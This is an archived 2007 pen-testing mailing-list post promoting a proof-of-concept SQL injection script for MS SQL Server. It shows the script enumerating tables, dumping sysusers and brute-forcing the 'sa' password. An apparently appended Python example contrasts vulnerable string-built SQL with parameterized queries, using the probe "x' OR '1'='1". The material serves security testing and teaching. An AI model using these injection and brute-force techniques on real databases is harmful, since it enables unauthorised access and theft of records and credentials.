Penetration Testing mailing list archives

Re: Open Source SQL Inject, XSS, Remote File Include Testing


From: Marco Ivaldi <raptor () mediaservice net>
Date: Mon, 21 May 2007 13:45:41 +0200 (ora solare Europa occidentale)

On Sat, 19 May 2007, winsoc wrote:

> Can anyone recommend a quick and cheerful Open Source Tool which will test websites for SQL Injection, XSS, Remote File Include?

Speaking of SQL injection, just wanted to point out a bash script I put together while pen-testing some web applications that use MS SQL Server as back-end:

http://www.0xdeadbeef.info/code/mssql-hax0r

# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational modes are currently available:
# info (Information Gathering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).

You shouldn't expect anything too fancy (it's still v0.1 after all;), but it does its job:

root@shaolin:~# ./mssql-hax0r info tables+++
DBFoobar
        Accounting (id:390494850)
                CanoneAnnuo (money)
                CodiceFornitore (varchar)
                dataInsert (datetime)
                GroupId (char) *
                GroupInsert (varchar)
                idAccount (varchar)
                idAnagrafica (int)
[...]
root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.

root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.

aaa
bbb
ccc
password

Password of 'sa' user is 'password'!;)

Enjoy,

--
Marco Ivaldi, OPST
Chief Security Officer    Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/
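The script above works only because the application splices untrusted input into the SQL text it sends to the database. The following is an added illustration, not code from the post or from mssql-hax0r: it uses an in-memory SQLite database as a stand-in for the MS SQL Server back-end (the `accounts` table, its rows, and the `x' OR '1'='1` probe string are all constructed for this example) and contrasts the string-concatenated query that such tools exercise with the parameterized form that treats the same input purely as data.

```python
import sqlite3


def make_db():
    # Constructed in-memory database standing in for the MS SQL Server
    # back-end discussed in the post; table and rows are made up.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, name TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [(1, "alice", 100), (2, "bob", 250), (3, "carol", 75)],
    )
    return conn


def lookup_vulnerable(conn, name):
    # Untrusted input is concatenated into the statement text, so a quote
    # character in it changes the structure of the query instead of being
    # compared against the name column. This is the pattern an injection
    # script exercises.
    sql = "SELECT id, name, balance FROM accounts WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    # The input is passed as a bound parameter, never as SQL text, so the
    # database can only ever compare it as a value.
    sql = "SELECT id, name, balance FROM accounts WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def breaks_query(conn, name):
    # True when the concatenated form raises a SQL syntax error for this
    # input: an unbalanced quote is the first symptom a tester (and a log
    # reviewer) sees when a parameter reaches the statement text unescaped.
    try:
        lookup_vulnerable(conn, name)
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    conn = make_db()
    benign = "alice"
    # Constructed probe: closes the string literal and appends an
    # always-true clause, so the vulnerable query matches every row.
    probe = "x' OR '1'='1"
    return {
        "vuln_benign": lookup_vulnerable(conn, benign),
        "vuln_probe": lookup_vulnerable(conn, probe),
        "param_benign": lookup_parameterized(conn, benign),
        "param_probe": lookup_parameterized(conn, probe),
        # A lone quote errors out in the concatenated form but is harmless
        # when bound as a parameter.
        "quote_breaks_vulnerable": breaks_query(conn, "O'Brien"),
        "quote_via_param": lookup_parameterized(conn, "O'Brien"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The concatenated lookup returns all three rows for the probe and raises a syntax error for a plain apostrophe, while the parameterized lookup returns nothing for either; the same behaviour holds against MS SQL Server when the driver's parameter binding is used instead of string building.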
